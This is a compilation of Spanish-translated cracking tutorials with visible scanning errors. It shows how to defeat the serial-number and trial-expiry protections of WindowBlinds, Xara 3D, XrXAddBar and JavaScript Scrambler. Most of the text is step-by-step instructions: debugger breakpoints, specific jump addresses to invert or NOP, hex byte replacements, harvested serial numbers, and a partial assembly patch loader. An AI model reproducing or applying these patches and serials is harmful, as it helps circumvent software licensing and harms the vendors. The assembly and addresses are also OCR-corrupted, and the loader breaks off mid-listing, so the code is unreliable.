O.k !! ejecuta el Window Blinds este mostrara una pantalla con tres opciones, una de ellas es para insertar el Numero de Serie, 
da click en ella, y aparece una ventana donde insertaras un Nombre y Numero de Serie !!! , Chingon!!! , ahora inserta tu 
nombre y un Numero de Serie cualquiera, da click en el boton de OK, y !!! boom !!!! sale un mensaje de error, o.k ..... 


notaste el tipo de Mensaje de Error ? si ? es un Message Box , entonces podemos poner un Break Point en esta Message Box, 
entonces ahora tu estas en la pantalla de Registro ok! presiona [Ctrl]+[d] y pon un Break Point como este: 


bpx MessageBoxA 


Ahora presiona ES para salir del Softlce, da click en el boton de o.k !! , inmediatamente saltaras al Softlce !! presiona F11 , el 
Mensaje de Error se desplegara, da click en o.k en la ventana del Mensaje de Error, entraras otra vez al Softlce y tu podras ver 
este codigo : 


:00427E37 Call [user32!MessageBoxA] 
:00427E3E pop esi <-- We Land HERE !!!> 
:00427E3F ret 000€ 


Ahora sube unas lineas hasta que veas este codigo : 


:00457E10 mov eax, [esp+08] <-- we set a bpx here !!> 

:00427E14 push esi <-- y the prog store esi in the stack !!! hmmm !!> 
:00427E15 test eax,eax 

:00427E17 mov esi,ecx 

:00427E19 jnz 00427E23 

:00427E1B call 0042F679 

:00427E20 mov eax, [eax+10] 

:00427E23 test esi,esi 

:00427E25 jnz 00427E2B 

:00427E27 xXOr ecx, ecx 
:00427E29 Jjmp 00427E2EÉ 
:00427E2B mov ecx, [esi+1C] 
:00427E2E push DWORD ptr [esp+10] 
:00427E32 push eax 
:00427E33 push DWORD ptr [esp+10] 
:00427E37 push ecx 
:00427E37 Call [user32!MessageBoxA] 


:00427E3E pop esi 
:00427E3F ret 000€ 


ahora escribe (bc *) para borrar todos los Break Points del Softlce y pon un nuevo Break Point en la dirección 00427E10 , tu 
puedes hacer esto escribiendo bpx 00427E10 , y presiona ES para salir del Softlce , ahora estas en la Ventana de Registro, todo 
lo que tienes que hacer es dar click en el boton de o.k , y saltaras inmediatamente al SoftICe en la dirección de memoria 
00457E10 , ahora hechale unvistazo a la linea que sigue despues, tu veras que el programa almacena un valor en la variable esi, 
pero por que lo almacena? , bueno veamos que es lo que esta almacenado en la variable ESI para ver el valor de esta debes 
usar 'd esi' y hechale un vistazo a la ventana de datos *boom* creo que es nuestro serial !! , en micaso salio este Nuemro de 
Serie : 


NAME : FaT[BIT]VTNT! 
CODE : WB-13ffldek 


bueno apunta ese numero y ve a la ventana de registro e insertalo yyyyyy ...... 


Window Blinds is REGISTERED 


El Parche | 


NO es Necesario !! 


Palabras Finales | 


Espero que hayas disfrutado este tutorial tanto como yo lo disfrute escribiendolo !! , y hasta nuestro proximo tutorial !!! 
FaT[BiT]_FaTSO Felicitaciones : 


tKC ( Realmente tu me enseñaste a usar la luz !!! Muchas gracias ) 
Lw2000 ( Gracias !!! Ahora si uso mi cerebro !!) 
Xasx (Hola !! El mejor presidente nunca visto) 
Sir_dReAm ( el mas chingon cracker !! ) 
Bonez (Gracias por tu Soporte !! ) 


vacsosiomers AN TICRACK!ITEAM! 


cya FaT[BiT] 1 TNT! 


Xara 3D v3.04 


Parchalo o Muere 


Resolución Optima1024 X 768 


by FaT[BiT] 1 TNT! 


Cracking para Principiantes 


Información 
Nombre : X3D.exe 
Tipo : Graphx Tool 

Url : http://www.xara.com 


Program Size : 906KB 


Herramientas : 


W32Dasm v8.93 


Hiew v6.16 
Facil ( X ) Medio ( ) Dificil ( ) Profesional (>) 


Xara 3D v3.04 
Crackeado and Escrito por : FaT[B1T]A TNT! 
Tutorial No. : 6 


Introducción | 


HOLA TODOS !! 
TRADUCIDO POR 


Pr fEsOr X / TnT !!! 


NOTA: DEL TRADUCTOR: esta traducción es un intento por poner a su disposición algunos tutoriales de crackers en 
ingles, ya que mucha información excelente se encuentra en ingles y es importante traducirla al español y una cosa 
gracias a todos los que han mandado sus tutoriales y sigan mandando mas tutoriales hagamos que esto cresca.. 


profesor_xG hotmail.com 


Protección | 


O.k ... Este programa necesita un Codigo para Activar todas sus propiedades !! , ahora en este tutorialnosotros parcharemos el 
ejecutable para que hacepte cualquier Codigo, te comento que este no será un tutorial muy largo, lo largo sera lo que tengas 
que parchar !!! 


Crackeando | 


O.k ... Ejecuta el Xara 3D, y lo primero que saldra será un mensaje con dos botones, Purchase y Continue, ahora da click en 
Purchase, o.k bueno lo que aparecera es una ventana diciendote que insertes el Codigo para desbloquear el programa, entonces 
insertemos cualquier numero, yo inserte el 24676 , y da click en o.k , y *boom* ahi lo tienes !!! nuestro Mensaje de Error!!, 
o.k tu conoces lo que tienes que hacer, copia el ejecutable X3D.exe a el directorio donde se encuentra instalado el W32DASM 
y desensamblalo !!! , cuando este finalize da click en el boton del SDR y busca el Mensaje de Error, da doble click sobre el, 
sube un poco y tu veras algo como esto: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 


|:0040FA34(C), :0040FA48(C), :0040FA64(C), :0040FA80(C), :0040FA9C(C) 
|:0040FAB8(C), :0040FAD4(C), :0040FAFO(C), :0040FB5D(C) <-- Hmm !!! Lot's of address let's check 
them> 


* Possible Reference to Dialog: DialogID_0133, CONTROL ID: 00FF, "" 


:0040FC16 6AFF push FEFEFFFEF 
:0040FC18 6A10 push 00000010 
* Possible Reference to String Resource ID=03005: "You entered an invalid unlock code. The program 


has not been" 


:0040FC1A 68BD0B0O000 push 00000BBD 
:0040FC1F E803EA0700 call 0048E627 


como tu puedes ver el Mensaje de Error es llamado desde 9 direcciones de memoria, hmmm !! . vamos a la primera y 
chequemosla, la primera seria 0040 FA34 . o.k da click en el btono de buscar e inserta el numero de la dirección de memoria, 
cuando tu lleges ahi, sube unas cuantas lineas y llegaras a este codigo : 


:0040FA1C E83F22FFFF call 00401C60 
:0040FA21 83F801 cmp eax, 00000001 
:0040FA24 0F85FA010000 jne 0040FC24 


:0040FA2A 8B842440010000 mov eaX, dword ptr [esp+00000140] 
:0040FA31 3958F8 cmp dword ptr [eax-08], ebx 
:0040FA34 0F85DC010000 jne 0040FC16 <-- first jump> 
:0040FA3A OFBE1O movsx edx, byte ptr leax] 
:0040FA3D 52 push edx 

:0040FA3E E89D7E0500 call 004678E0 

:0040FA43 83C404 add esp, 00000004 

:0040FA46 85C0 test eax, eax 

:0040FA48 0F84C8010000 je 0040FC16 <-- Second jump> 
:0040FA4E 8B842440010000 mov eax, dword ptr [esp+00000140] 
:0040FA55 OFBE4801 movsx ecx, byte ptr [eax+01] 
:0040FA59 51 push ecx 

:0040FAS5A E8817E0500 call 004678E0 

:0040FA5F 83C404 add esp, 00000004 

:0040FA62 85C0 test eax, eax 

:0040FA64 0F84AC010000 je 0040FC16 <-- Thrid jump> 
:0040FAGA 8B942440010000 mov edx, dword ptr [esp+00000140] 
:0040FA71 0FBE4202 movsx eax, byte ptr [edx+02] 
:0040FA75 50 push eax 

:0040FA76 E8657E0500 call 004678E0 

:0040FA7B 83C404 add esp, 00000004 


ahora lo que se hará será parchar los nueve saltos!! los cambiaras asi " donde tu encuentres un JE por un JNE osea un 74 por 
un 75 , y donde tu encuentres un JNE lo cambiaras por JE o sea un 75 por 74, and i also don't have to tell you how to patch or 
how to run and use Hiew !!! right 


Parchando | 


ve a las siguientes direcciones y parchalas : 


:0040FA34 jne --- Je 
:0040FA48 je --- jne 
:0040FA64 je --- jne 
:0040FA80 Je --- jne 
:0040FA9C je --- jne 
:0040FAB8 je --- jne 
:0040FAD4 je --- jne 
:0040FAFO je --- jne 
:0040FB5D jne --- Je 


o.k cuando hayas terminado, copia el X3D.exe a su directorio original y ejecutalo, o.k ahora inserta cualquier codigo que 
gustes!! y ahi esta lo acepto!! 


XARA 3D IS UNLOCKED 


Final Words | 


FaT[BiT]_FaTSO Felicitaciones : 
tKC (me enseñaste la verdadera LUZ !!! muchas gracias ) 
LwW2000 ( Gracias !!! ahora ya uso mi cerebro !!) 
Xasx (Hola !! este tutorial es dedicado a ti !!) 
Sir_dReAm (espero te guste este tutorial !!! ) 
MazM ( Donde Diablos estas !! ) 
BillGamEZ ( Gracias !! eres un verdadero amigo !! ) 


Bonez (Gracias por tu Ayuda !! ) 


y atodos los Miembros de 


TNTICRACK!'TEAM! 


cya FaT[BiT]A TNT! 


XrXAddBar v2.0 Beta 


Usalo por Siempre 


Resolución Optima 1024 X 768 


by FaT[BiT] 1 TNT! 


Cracking para Principiantes 


Información 


Nombre : xrxaddbar.exe 


Tipo : Logo Util 


Url : N/A 


Tamaño : 680KB 


Herramientas : 


W32Dasm v8.93 


Hiew v6.16 
Facil ( X ) Medio ( ) Dificil ( ) Profesional (>) 


XrXAddBar v2.0 Beta 
Crackeado y Escrito por : FaT[B1T] A TNT! 
Tutorial No. : 7 


Introducción | 


TRADUCIDO AL ESPAÑOL POR !! 
PrfEsOr X !!! 


NOTA: DEL TRADUCTOR: esta traducción es un intento por poner a su disposición algunos tutoriales de crackers en 
ingles, si tienes interes en escribir y compartir tus conocimentos y que tus tutoriales se han incluidos en la compilación 
mandanos tus tutoriales seran bienvenidos. 


profesor_xG hotmail.com 


Protección | 


Para aquellos que no sben que hace este programa, este programa puede cambiar el Logo del inicio de Windows Win9X como 
tambien el logotipo de espera al iniciar windows y el logotipo the Shutdown. claro que tu puedes hacer esto manualmente pero 
con este programa es mucho mas facil. 


o.k este programa no necesita ningun Codigo de Registro o algo parecido, el problema con este programa es que despues de 30 
días, se para y deja de cargar las imagenes con las que confiuraste Windows, por lotanto este tutorial te mostrara como quitar el 
Limite de Tiempo y asi lo puedas usar por siempre, entonces empecemos !! 


Crackeando | 


al rpincipio yo pense que este programa era un FREEWARE , pero no!!! estaba equivocado, un día quise cambiar el logo de 
inicio de windows y *boom* , un mensaje aparecio diciendome que este programa habia expirado.!!! , por lo tanto si tu ves ese 
mensaje, ya sabras que hacer, ahora copia el ejecutable de xrxaddbar.exe a la carpeta del win32dasm y desensamblalo, cuando 
ya haya terminado de desensamblarse busca el mensaje de error y da doble click sobre el y nos mandara a esta parte del codigo 


:0048D016 9E sahf 
:0048D017 761F jbe 0048D038 <-- if not expired then jump> 
:0048D019 6A00 push 00000000 


* Possible StringData Ref from Code Obj -"XrX Add Bar Beta(2)" 


:0048D01B 68C8D04800 push 0048D0C8 


* Possible StringData Ref from Code Obj -"This Beta Version has Expired," 
:0048D020 68DCD04800 push 0048D0DC 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0048CFAF (C) 


:0048D025 6A00 push 00000000 


0.k puedes ver el salto que se encuentra en la dirección 0048D017 !! , todo lo que tenemos que hacer es parcharlo !!! y nunca 
mas expirara, 0.k yo lo parchare usando el hiew !!! ahora ejecutalo y !!! QUE !!! el mensaje de error sigue ahi !!! hmmm..... o.k 
vamos de regreso a el win32dasm busca el mensaje de error y da doble click en el, da doble click otra vez , hechale un vistazo, 
la direccion a cambiado, da otra vez click y hmmm !!! la dirección cambio tra vez !!! hmmm !!! 


Hay tres direcciones de memoria para este error !!! vamos a ver la segunda 


NOTE : estas direcciones pueden ser diferentes en tu maquina. 


aterrizamos en esta parte de codigo !!! 


:0048D19E 9E sahf 
:0048D19F 761F jbe 0048D1C0 <-- the 2nd jump> 
:0048D1A1 6A00 push 00000000 


* Possible StringData Ref from Code Ob] -"XrX Add Bar Beta(2)" 


:0048D1A3 6890D44800 push 0048D490 


* Possible StringData Ref from Code Obj -"This Beta Version has Expired," 


:0048D1A8 68A4D44800 push 0048D4A4 
:0048D1AD 6A00 push 00000000 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0048D139(C) 


The Patch | 


Ahora sabemos que existen tres direcciones donde el programa checa si el periodo a expirado o no ha expirado !! que son : 
0048D7F6 , 0048D017 and 0048D19F 


Ahora lo unico que tenemos que hacer es parchar los saltos como se ve a continuación 


0048D017 761F jbe 0048D038 changeto 0048D017 EB1F jmps 0048D038 
0048D19F 761F jJbe 0048D038 changeto 0048D19F EB1F jmps 0048D038 
0048D7F6 761F jJbe 0048D038 changeto 0048D7F6 EB1F jmps 0048D038 


o.k creo que ya parchaste los tutoriales , ahora vamos y ejecutamos el XrXAddBar y escojemos una imagen para ponerla como 
logo !!! y si!! ahi lo tienes !! 


XrXAddBar Nunca Expirara!! 


Palabras Finales | 


O.k espero que hayas disfrutado este tutorial tanto como yo lo disfrute escribiendolo !!! 


FaT[Bi1T]_FaTSO Felicitaciones : tKKC ( me enseñaste la verdadera LUZ !!! muchas gracias ) LW2000 ( Gracias !!! ahora ya 
uso mi cerebro !!) Xasx (Hola !! este tutorial es dedicado a ti !!) Sir_dReAm ( espero te guste este tutorial !!! ) MazM ( Donde 
Diablos estas !! ) BillGamEZ ( Gracias !! eres un verdadero amigo !! ) Bonez (Gracias por tu Ayuda !! ) y atodos los 
Miembros de 


TNT!ICRACK!'TEAM! 


cya FaT[BiT] A TNT! 


Mayo 1998 "JavaScri pt Scrambler V1.11" (Usando PROGRAMA Win '95 Win Code Reversing 
el crack del eco en la memoria ) 
por The Sandman 


Code Reversing Para Principiantes 


Detalles del Programa Nombre del Programa: 
Scram111.zip Tipo de Programa: Protección de Código 
Javascript Localización del Programa: Aquí o Aquí 

Tamaño del Programa: 136K 


Herramientas Utilizadas: Softice 3.2 — Depurador 
W32Dasm V8.9- Desensamblador 


Calificación Fácil (X) Medio ( ) Difícil ( ) Profesional ( ) Hay una grieta, una grieta en todo . Así es como la luz penetra. 


JavaScript Scrambler V1.11 ( Usando el crack del eco en la memoria ) Escrito por The Sandman 


Introducción 


Al autor de esta utilidad se le puede localizar en: http://members.tripod.com/-tier 


El autor dice: 


"Una utilidad para todos los programadores de JavaScript que están hartos del hecho de que su código pueda ser robado y sencillamente 
modificado. JavaScript Scrambler codificará cualquier script de código fuente hasta que resulte de casi imposible comprensión para otros." 


Acerca de este sistema de protección 


Se registra seleccionando la pestaña 'Register' .. Aquí se nos pedirá introducir: 


(Nombre) Name 
(N* de Serie) Serial No 


El código de registro está basado en lo que se tecleó para el nombre/identificador. También varía en tamaño (número total de caracteres alfanuméricos) 
pero normalmente toma la forma: 1234-567-89 


Una vez registrado, el programa guarda el nombre y código de registro en: 


CAWindowsWSScrambler.ini y adopta la forma: 


[JavaScript Scrambler] 
Name=The Sandman 
Serial Number=1936-957-76 


No os aprovechéis y uséis mi clave de registro, sino una propia vuestra. 


| El ensayo 


Estaba yo leyendo una de los tutoriales de +ORC hace unos días, cuando una de las partes me resultó especialmente interesante. +ORC 
explicaba brevemente los "Ecos en la Memoria" y los "Volcados de Memoria" en los que se podía acceder fácilmente a las contraseñas 
válidas (al ser generadas por el propio programa víctima) con tal de saber dónde hallarlas. Como la mayoría de los newbies, leí esa sección 
y seguí leyendo el resto del tutorial, sin darme apenas cuenta de que pocos días después iba a "descubrir" esta técnica por mí mismo y a 
usarla con éxito para hacer un crack muy interesante. Yo no había planeado usar esta misma técnica; tan solo se reveló como el "mejor" 
método para realizar este crack. En primer lugar, he aquí la sección del texto que leí en el tutorial de +Orc :- 


"Dentro de casi todas las rutinas de protección, como ya habéis aprendido, hay un momento en que aparece en la pila el ECO de la auténtica, "correcta" 
contraseña o número. La localización de este ECO varía, pero la mayoría de las veces estará en una extensión +- 0x90 bytes de una de las direcciones donde 
residen los datos introducidos por el usuario. Esto se debe al volcado de datos que windows limita dentro de las herramientas que usan los proteccionistas... pero 
esta práctica está llamada a disminuir... especialmente tras esta lección :=) 


El truco de esta lección: [constricción de datos], o "proximidad de la contraseña", se basa en la necesidad del proteccionista de no perder de vista la protección 
"trabajando" cuando él la ensambla. Él debe "ver" las relaciones entre los DATOS INTRODUCIDOS POR EL USUARIO, DATOS DEL USUARIO 
TRANSFORMADOS y la RESPUESTA NUMÉRICA CORRECTA ( en nuestra jerga el "Bingo") 


Estas relaciones deben ser constantemente verifcadas para depurar el código de protección. La mayoría de las ocasiones residirán JUNTAS dentro de una 
pequeña área de la pila, permitiéndoles ser "vistas" en la MISMA ventana de observación. Casi siempre, por tanto, el ECO se "materializará" brevemente no muy 
lejos de una de las localizaciones de los DATOS INTRODUCIDOS POR EL USUARIO." 


Para algunos de vosotros el texto señalado resultará un tanto incomprensible, porque nuestro conocimiento del Lenguaje Ensamblador 
puede ser aún escaso, por lo que permitidme que intente explicar lo que +ORC dice aquí y elaborarlo en cierta medida, a la vez. 


Probablemente ya sabéis que los programas que usan una contraseña ('Password'") o Número de Registro ("Registration Key") DEBEN ser 
capaces de comparar el introducido por nosotros con el que ÉL espera que hayamos introducido. Bien, para hacer eso este programa- 
víctima (aquel que queremos crackear) o tiene el password correcto a mano (escondido dentro del propio programa), o debe generar uno él 
mismo, a fin de contrastarlo con el password/Clave de Registro que hemos introducido. ¿Está claro hasta aquí? 


Aquí es donde se pone interesante... 


Cuando se llega a la verificación de las Passwords/Claves de registro, normalmente el programa debe colocarlas ambas muy cerca en la 
memoria del ordenador y entonces efectúa la comprobación. En este punto NO nos importa el modo en que el programa-víctima crea o 
verifica estas Passwords/Claves de registro. Lo que importa es que si el programa puede "ver" ambas Passwords/Claves de registro, 
entonces nosotros podemos aprovechar este hecho y hacer que el programa NOS MUESTRE la Password/Clave de registro correcta, en 
lugar de decirnos que nuestra Password/Clave de registro era inválida. 


Hasta ahora yo siempre he optado por el método 'Comparación y Salto' para quebrar programas, lo que significaba que siempre he hecho 
mis cracks después de que la víctima hubiera realizado el chequeo de validación para la Password/Clave de registro. Sería aquí donde yo 
"Nop"aría (90h) o cambiaría el salto condicional (p.e. Jnz) por otro forzoso ( ejemplo: Jmp). 


Uno de los métodos de crackeo más populares para programas con Clave de Registro/Número de serie parece ser la realización de 
"Generadores de Claves" ('Key Generators' ), en los que el cracker crea un pequeño programa. Cuando el Usuario introduce un nombre en 
él, este programa genera una clave de registro válida que el Usuario puede utilizar posteriormente para registrar su programa-víctima. Pero 
esto supone necesariamente entender cómo trabaja el programa-víctima; más en concreto, el algoritmo que usa para crear estos números 
de serie/registro. Como principiantes, esto puede parecer demasiado difícil, pero ¿y si hubiera un modo mucho "mejor" de hacer el mismo 
trabajo que estas Key Generators y requiriera muy poco conocimiento de Lenguaje Ensamblador? 


Sigamos quebrando JavaScript Scrambler e incorporemos nuestro nuevo método de crackeo en la labor. 


En primer lugar, hice un Listado de Desensamblado ( 'Dead Listing" ) de la víctima usando W32Dasm. Luego busqué en los Recursos de 
Cadenas de Datos (String Data Resources) por si aparecía algún 'Serial number', que no fue el caso. Pero encontré una curiosa referencia 
a la cadena "HEGRTZUINQYAXLPSWBMFOCDJKV,.- " que tiene aspecto de número de serie y que ahora sé positivamente que es usada 
por el programa durante el proceso de creación de números de serie válidos. 


Como normalmente uso el método de crackeo "Comparación y luego Salto' cuando el programa decide saltar bien a la rutina 'Beggar off 
(expresión con la que nos referimos al mensaje que aparece cuando no conseguimos registrar el programa) o a la rutina "Thank you for 
purchasing....' (Gracias por comprar...) hice doble click en la referencia a la cadena: "The serial number you entered, (El número de serie 
que ha introducido...)" 


Esto me trajo entonces a este interesante bloque de código (explicaré brevemente por qué):- 


* Referenced by a (C)onditional Jump at Addresses:00433F82(C),:00433FA0 (C) 


:0043406D B8A0414300 mov eax, 004341A0 ;"El número de serie 

; que ha introducido era incorrecto" 
:00434072 ESGDBL1FFFF 
:00434077 33D2 


:00434079 8B832C020000 


call 0042F1E4 
xor edx, edx 


mov eax, dword ptr [ebx+0000022C] 


Mirad. Hay dos sitios en la víctima (:00433f82 y :00433FAO ) que deciden si el número de serie que pusimos es incorrecto, asi que vayamos 
a hallarlos. Por la localización de sus offsets están muy cerca el uno del otro..:) 


¡ECHAD UN VISTAZO A ESTO!. El proteccionista (término con el que se refiere al encargado de implementar las rutinas de protección del 
programa) ha mantenido todo su código junto; eso era más sencillo para él a la hora de probarlo y depurarlo, y, ciertamente, también hace 
más fácil nuestro "trabajo". 


Lo que tenemos aquí son nuestros dos saltos condicionales a las rutinas 'Beggar off Cracker' . También tenemos la rutina que genera el 
archivo JSScramble.ini file para que cuando se determine que nuestro número de serie es correcto lo coloque allí junto con el Nombre de 
Usuario que introdujimos. 


:00433F82 0F8EE5000000 jle 0043406D ; Nos manda al mensaje Beggar off 
:00433F88 8D4DF4 lea ecx, dword ptr [ebp-0C] 
:00433F8B 8B55FC mov edx, dword ptr [ebp-04] ; Localización de nuestro Nombre 
; de Usuario 

:00433F8E 8BC3 mov eax, ebx 
:00433F90 ES1BFAFFFF call 004339B0 ; Genera nuestro N” de Serie 
:00433F95 8B45F4 mov eax, dword ptr [ebp-0C]; apunta al n” de serie 'real' 
:00433F98 8B55F8 mov edx, dword ptr [ebp-08] 
:00433F9B ESAOFBFCFF call 00403B40 
:00433FA0 0F85C7000000 jne 0043406D ; Nos manda al mensaje Beggar off 

; si el n” de serie es incorrecto. 

; Si no, crea un archivo .ini 

; y guarda el Nombre de Usuario 

; y N” de serie en él. 
:00433FA6 C6054859430001 mov byte ptr [00435948], 01 

| 

:00433FAD B9D4404300 mov ecx, 004340D4 ; El nombre de nuestro archivo .ini 

; es JSScramble.ini 
:00433FB2 B201 mov dl, 01 
:00433FB4 A1D4F34200 mov eax, dword ptr [0042F3D4] 
:00433FB9 E872B4FFFF call 0042F430 ; Crea el archivo .ini 
:00433FBE 8BFO mov esi, eax 
:00433FC0 8B45FC mov eax, dword ptr [ebp-04] 
:00433FC3 50 push eax 
:00433FC4 B9EC404300 mov ecx, 004340EC ; Guarda "Name=" en el 

; archivo .ini 

:00433FC9 BAFC404300 mov edx, 004340FC 


:00433FCE 8BC6 mov eax, esi 
:00433FDO0 ESEFB4FFFF call 0042F4C4 ; Guarda en el archivo .ini nuestro 
; Nombre/identificador de Usuario 


:00433FD5 8B45F8 mov eax, dword ptr [ebp-08] 
:00433FD8 50 push eax 
:00433FD9 B91C414300 mov ecx, 0043411C ; Guarda "Serial Number=" 


; en el archivo .ini 


:00433FDE BAFC404300 mov edx, 004340FC 
:00433FE3 8BC6 mov eax, esi 
:00433FE5 ESDAB4FFFF call 0042F4C4 ; Guarda en el archivo .ini 
¿; nuestro N” de serie 
:00433FEA 8BC6 mov eax, esi 
:00433FEC ES5FEDFCFF call 00402D50 
:00433FF1 B834414300 mov eax, 00434134 ; Muestra el mensaje'Thank you...' 
:00433FF6 ESE9BL1FFFF call 0042F1E4 


Si, como yo, "nopeáis" (90h) los dos saltos condicionales en las direcciones de memoria:- 


:00433FA0  0F85C7000000 jne 0043406D 
:00433F82  0F8EE5000000 jle 0043406D 


entonces cuando metáis vuestro falso N* de serie, el programa lo aceptará y procederá a crear el archivo SScramble.ini con vuestro 
nombre/identificador, junto con vuestro n* de serie falso. Me apresuro a añadir aquí que esto NO hace que el programa quede registrado, 
ya que cuando se ejecuta el programa de nuevo, carga el N* de serie desde el archivo .ini y lo comprueba para ver si, en efecto, el número 
es correcto, cosa que no es así, por lo que considera que aún está no-registrado. Buen intento, no obstante. De hecho, algunos programas 
guardan el N* de serie "bueno" en el archivo .ini, en lugar del falso, pero no es este el caso..:( Volvemos a la casilla de salida. 


Si fuéramos a continuar con este plan de ataque, ahora tendríamos que buscar en la víctima y desactivar la comprobación que hace de 
nuestro número falso cuando el programa comienza a ejecutarse, pero ¿no se está complicando esto un poco? Al fin y al cabo hay modos 
mucho mejores de enfrentarse a este programa. 


Fue en ESTE momento cuando lo que decía +ORC sobre "Ecos en la Memoria" de pronto empezó a cobrar sentido. Sentía algo diferente 
acerca de este programa, lo cual me hizo pensar de nuevo en mi plan de ataque a este sistema de protección. 


En Softice fui paso a paso recorriendo el código de arriba, observando qué sucedía con mi falso número, mientras todavía podía ver el 


número "bueno" formándose carácter a carácter. Allí estaba yo observándolos a los dos al mismo tiempo en una pequeña pantalla de 
softice. 


Echemos otro vistazo a aquella rutina 'Beggar off cracker" :- 


* Referenced by a (C)onditional Jump at Addresses:00433F82(C),:00433FAO0(C) 


:0043406D B8A0414300 mov eax, 004341A0 ; "El Número de serie 
; que ha introducido es incorrecto" 

:00434072 ESGDBLFFFF call 0042F1E4 

:00434077 33D2 xor edx, edx 

:00434079 8B832C020000 mov eax, dword ptr [ebx+0000022C] 

:0043407F E86868FEFF call 0041A8EC ; Crea una messagebox 

:00434084 33D2 xor edx, edx 

:00434086 8B8330020000 mov eax, dword ptr [ebx+00000230] 


Está creando un cuadro de diálogo(messagebox) en la pantalla, que nos dice que nuestro número de serie es incorrecto, y 
si miráis este mensaje en la memoria, veréis que termina con un byte '0', lo que significa para la rutina del messagebox 
que es el final del mensaje. Si miráis al número de serie "bueno" en la memoria, veréis que ese también termina con este 


byte '0'. ¿Podéis sentirlo ya? 


El número de serie bueno que está guardado en la memoria es para el ordenador como el texto del mensaje 'beggar off 
cracker', de modo que ¿por qué no hacer que la rutina de este mensaje 'Beggar off cracker' muestre el número de serie 


bueno en lugar de mandarnos a paseo? 


Todo lo que necesitamos hacer es cargar la dirección de memoria del N” de serie bueno, en lugar del mensaje 'Beggar 
off'. Así que mi primer intento consistió en cambiar la dirección de memoria del mensaje 'beggar off' para que 


"apuntase" a la dirección del N” de serie bueno. Esto se logró cambiando: 


:0043406D mov eax, 004341A0 ; ==>Localización del mensaje 'beggar off'. 
POR 
:0043406D mov eax, 007A8594 ; Ahora apunta al N” de serie bueno. 


Esto funcionó una vez y el N* de serie bueno se mostró en lugar del texto del mensaje 'Beggar off' , pero al ejecutar el programa otra vez, 
tan solo apareció basura en su lugar. 


Al ejecutar Softice me di cuenta de que la dirección de memoria del número bueno así como el introducido por mí eran guardados esta vez 
¡en una dirección de memoria diferente! ¿Qué pasa? Luego pensé: "Bien, si esto sucede ¿cómo sabe entonces el programa dónde tiene 
que ir a buscar el n* de serie bueno, si su dirección de memoria cambia siempre porque hay otros programas en ese momento ocupando 
memoria?" 


Examinando otra vez esta sección del código desde Softice, de repente apareció la respuesta que buscaba. 


:00433F82 0F8EE5000000 jle 0043406D ; Nos manda al mensaje Beggar off 
:00433F88 8D4DF4 lea ecx, dword ptr [ebp-0C] 

:00433F8B 8B55FC mov edx, dword ptr [ebp-04] 

:00433F8E 8BC3 mov eax, ebx 

:00433F90 ES1BFAFFFF call 004339B0 

:00433F95 8B45F4 mov eax, dword ptr [ebp-0C] ; ¡Esta instrucción 


; señala SIEMPRE a la 
; dirección de memoria 
; del n” de serie bueno! 


:00433F98 8B55F8 mov edx, dword ptr [ebp-08] 
:00433F9B ESAOFBFCFF call 00403B40 


Por tanto, si la instrucción mov eax, dword ptr [ebp-0C] sabe siempre en qué lugar de la memoria está el número "bueno", ¡por qué no 
usarla en lugar de mov eax, 007A8594 y rellenar ahora con NOPs (90h) los espacio libres que se han creado al usar una instrucción que 
precisa unos cuantos bytes menos que la que acabamos de reemplazar! 


Así que eso fue lo que hice y ¡funcionaba!. Por lo tanto, ahora si se mete un número de serie incorrecto el programa os dice lo que deberíais haber escrito. 
¡Mucho mejor que nuestro viejo mensaje “beggar off..:)! Ahora tenemos el programa no solo crackeado sino que también lo hemos convertido en nuestro 
propio 'Serial Key Generator”. 


Misión Cumplida..... 


El 'Crack' 


Cargad jsscram.exe en vuestro editor hexadecimal y 
SEARCH (BUSCAD) la siguiente cadena hexadecimal: "EB35B8A0414300" 


00033450 83F80100 008B10FF 52508B93 EC0O10000 ........ Renta 
00033460 8B83E801 0000E845 D2FFFFEB 35B8A041 ....... E....5..A 
00033470 4300E86D B1FFFF33 D28B832C 020000E8 C..M...3...,.... 


Ahora REPLACE (SUSTITUID) los siguientes bytes RESALTADOS: 


00033450 83F80100 008B10FF 52508B93 EC0O10000 ........ RP a 
00033460 8B83E801 0000E845 D2FFFFEB 358B45F4 ....... Evo Es 
00033470 9090E86D B1FFFF33 D28B832C 020000E8 ...M...3...,.... 


O, si lo preferís, podéis usar este "crack loader" (cargador), que he hecho usando PATCH ENGINE V2.0 — de RTD. Gracias, muchachos..:) 


code segment byte public 


assume cs:code, ds:code 


org 100h 
start: 
mov dx,offset logo ; Mostrar vuestro logo 
Call write ; Escribir el mensaje 
call open_file ; Adivinadlo... 
mov filehandle,ax ; Poner el nombre del archivo en "filehandle" 
mov dx,offset fsize 
Call write ; Escribir el mensaje 
call check _size ; Comprobar el tamaño real del archivo 
mov di,offset data ; Apuntar di a la tabla de datos 
mov si,offset ofs ; Apuntar si a la tabla de desplazamientos 
mov Cx,5 ; Bucle de 5 repeticiones para cada byte cambiado 
mov dx,offset crackfile 
Call write ; Escribir el mensaje 
crackit: 
push cx ; Guardar cx 
call seek file ; Buscar en el archivo 
Call read file ; Leer un byte y comparar 
call seek file ; Buscar de nuevo (atrás) 
Call write file ; Escribir el byte 
add si,4 ; Añadir 4 a si 2*sizeof (word) 
add di,2 ; Añadir 2 a di 2*sizeof (byte) 
pop cx ; Recuperar cx 
loop crackit ; Bucle Crackit 
mov dx,offset cracksucc 
jmp short goback 
already patched: 
mov dx,offset alreadycrk 
jmp short goback 
size _mismatch: 
mov dx,offset sizemismtch 
jmp short goback 
error: 
mov dx,offset erroropen 
goback: 
Call write ; Escribir el mensaje 
call close file ; Cerrar el archivo 
mov ah, 4Ch ; Saltar de nuevo al sistema operativo 
int 21h 
Write proc near 
push ax 
mov ah, 9 
int 21h ; Mostrar la cadena 
pop ax 
retn 
Write endp 
open file proc near 
mov ah,3Dh 


mov al,2 ; abrir la función de archivo 3Dh 


open file 


close_file 


close_file 


check_size 


check_size 


read_file 


read_file 


write file 


write file 


seek_file 


here: 


mov 
int 
jb 
retn 


endp 


proc 
mov 
mov 
int 
retn 


endp 


proc 
mov 
mov 
xor 
xor 
int 
Jb 
cmp 
jne 
cmp 
jne 
retn 


endp 


proc 
mov 
mov 
mov 
mov 
int 
mov 
cmp 
jne 
jb e 
retn 


endp 


proc 
mov 
mov 
mov 
mov 
inc 
int 
Jb 
retn 


endp 


proc 
mov 
mov 
mov 
mov 
mov 
int 


jnc 


dx,offset filenaam 
21h 


error 


